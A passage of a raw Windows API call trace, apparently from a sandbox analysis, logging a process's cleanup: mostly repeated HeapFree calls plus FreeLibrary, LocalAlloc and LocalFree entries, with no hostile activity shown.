dwFlags=0x0, lpMem=0x34a960 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a980 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3073d0 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34b7f0 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa50 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa30 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3073c0 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9d0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a940 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a880 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8c0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8a0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307390 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8e0 | out: 
hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9b0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa10 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9f0 | out: hHeap=0x2c0000) returned 1 [0229.641] GetProcessHeap () returned 0x2c0000 [0229.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a990 | out: hHeap=0x2c0000) returned 1 [0230.018] GetProcessHeap () returned 0x2c0000 [0230.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ec30 | out: hHeap=0x2c0000) returned 1 [0230.018] FreeLibrary (hLibModule=0xc90000) returned 1 [0230.018] FreeLibrary (hLibModule=0x7fefbc80000) returned 1 [0230.020] free (_Block=0x277e90) [0230.022] LocalFree (hMem=0x2e4580) returned 0x0 [0230.022] LocalFree (hMem=0x2e48d0) returned 0x0 [0230.022] LocalFree (hMem=0x2e49e0) returned 0x0 [0230.022] LocalFree (hMem=0x2e3080) returned 0x0 [0230.022] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x339190 [0230.022] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2e3080 [0230.022] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x345eb0 [0230.023] free (_Block=0x275a70) [0230.023] free (_Block=0x0) [0230.023] free (_Block=0x275a50) [0230.023] free (_Block=0x275a90) [0230.023] free (_Block=0x275ae0) [0230.023] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x347530 [0230.030] LocalFree (hMem=0x347530) returned 0x0 [0230.030] LocalFree (hMem=0x2e4a00) returned 0x0 [0230.030] LocalFree (hMem=0x339190) returned 0x0 [0230.030] free (_Block=0x277c80) [0230.030] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x7fefdee0000 [0230.031] FreeLibrary (hLibModule=0x7fefdee0000) returned 1 [0230.031] LocalFree (hMem=0x345eb0) returned 0x0 [0230.031] LocalFree (hMem=0x2e3080) returned 0x0 [0230.031] 
GlobalHandle (pMem=0x2e4360) returned 0xb80008 [0230.031] GlobalUnlock (hMem=0xb80008) returned 0 [0230.098] FreeLibrary (hLibModule=0x7fef3720000) returned 1 [0230.100] FreeLibrary (hLibModule=0x7fef4d70000) returned 1 [0230.125] FreeLibrary (hLibModule=0x7fef4370000) returned 1 [0230.128] FreeLibrary (hLibModule=0x7fefb970000) returned 1 [0230.129] FreeLibrary (hLibModule=0x7fef4350000) returned 1 [0230.135] FreeLibrary (hLibModule=0x7fef36a0000) returned 1 [0230.138] FreeLibrary (hLibModule=0x7fef92c0000) returned 1 [0230.140] FreeLibrary (hLibModule=0x7fef3660000) returned 1 [0230.145] FreeLibrary (hLibModule=0x7fef4c20000) returned 1 [0230.150] FreeLibrary (hLibModule=0x7fef4c10000) returned 1 [0230.203] FreeLibrary (hLibModule=0x7fef4c00000) returned 1 [0230.206] FreeLibrary (hLibModule=0x7fef4be0000) returned 1 [0230.209] FreeLibrary (hLibModule=0x7fef3450000) returned 1 [0230.242] FreeLibrary (hLibModule=0x7fef4cf0000) returned 1 [0230.293] FreeLibrary (hLibModule=0x7fef3250000) returned 1 [0230.311] FreeLibrary (hLibModule=0x7fef4c50000) returned 1 [0230.312] FreeLibrary (hLibModule=0x7fef4b20000) returned 1 [0231.565] FreeLibrary (hLibModule=0x7fef4c40000) returned 1 [0231.568] FreeLibrary (hLibModule=0x7fef4a00000) returned 1 [0231.586] FreeLibrary (hLibModule=0x7fef3070000) returned 1 [0231.591] GetProcessHeap () returned 0x2c0000 [0231.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e8b0 | out: hHeap=0x2c0000) returned 1 [0231.643] GetProcessHeap () returned 0x2c0000 [0231.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07d0 | out: hHeap=0x2c0000) returned 1 [0231.643] GetProcessHeap () returned 0x2c0000 [0231.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07f0 | out: hHeap=0x2c0000) returned 1 [0231.643] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0810 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: 
hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0830 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0850 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0870 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08c0 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08e0 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0900 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0920 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0940 | out: hHeap=0x2c0000) returned 1 [0231.644] GetProcessHeap () returned 0x2c0000 [0231.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0960 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0980 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e09a0 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e09c0 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e09e0 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a00 | 
out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a20 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a40 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a60 | out: hHeap=0x2c0000) returned 1 [0231.645] GetProcessHeap () returned 0x2c0000 [0231.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0a80 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0aa0 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ac0 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ae0 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0b00 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0b20 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0b40 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0b60 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0b80 | out: hHeap=0x2c0000) returned 1 [0231.646] GetProcessHeap () returned 0x2c0000 [0231.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ba0 | out: hHeap=0x2c0000) returned 1 [0231.647] 
GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0bc0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0be0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c00 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c20 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c40 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c60 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0c80 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ca0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0cc0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ce0 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d00 | out: hHeap=0x2c0000) returned 1 [0231.647] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d20 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d40 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] 
HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d60 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0d80 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0da0 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0dc0 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0de0 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e00 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e20 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e40 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e60 | out: hHeap=0x2c0000) returned 1 [0231.648] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e80 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ea0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ec0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0ee0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 
lpMem=0x2e0f00 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0f20 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0f40 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0f60 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0f80 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0fa0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0fc0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0fe0 | out: hHeap=0x2c0000) returned 1 [0231.649] GetProcessHeap () returned 0x2c0000 [0231.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1000 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1020 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1040 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1060 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e10c0 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e10e0 | out: hHeap=0x2c0000) returned 1 
[0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1100 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1120 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1140 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1160 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1180 | out: hHeap=0x2c0000) returned 1 [0231.650] GetProcessHeap () returned 0x2c0000 [0231.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e11a0 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e11c0 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e11e0 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1200 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1220 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1240 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1260 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1280 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 
[0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e12a0 | out: hHeap=0x2c0000) returned 1 [0231.651] GetProcessHeap () returned 0x2c0000 [0231.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e12c0 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e12e0 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1300 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1320 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1340 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1360 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1380 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e13a0 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e13c0 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e13e0 | out: hHeap=0x2c0000) returned 1 [0231.652] GetProcessHeap () returned 0x2c0000 [0231.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1400 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1420 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, 
dwFlags=0x0, lpMem=0x2e1440 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1460 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1480 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e14a0 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e14c0 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e14e0 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1500 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1520 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1540 | out: hHeap=0x2c0000) returned 1 [0231.653] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1560 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1580 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e15a0 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e15c0 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e15e0 | out: 
hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1600 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1620 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1640 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1660 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1680 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e16a0 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e16c0 | out: hHeap=0x2c0000) returned 1 [0231.654] GetProcessHeap () returned 0x2c0000 [0231.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e16e0 | out: hHeap=0x2c0000) returned 1 [0231.655] GetProcessHeap () returned 0x2c0000 [0231.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1700 | out: hHeap=0x2c0000) returned 1 [0231.655] GetProcessHeap () returned 0x2c0000 [0231.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1720 | out: hHeap=0x2c0000) returned 1 [0231.661] GetProcessHeap () returned 0x2c0000 [0231.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1740 | out: hHeap=0x2c0000) returned 1 [0231.661] GetProcessHeap () returned 0x2c0000 [0231.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1760 | out: hHeap=0x2c0000) returned 1 [0231.661] GetProcessHeap () returned 0x2c0000 [0231.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1780 | out: hHeap=0x2c0000) returned 1 [0231.662] 
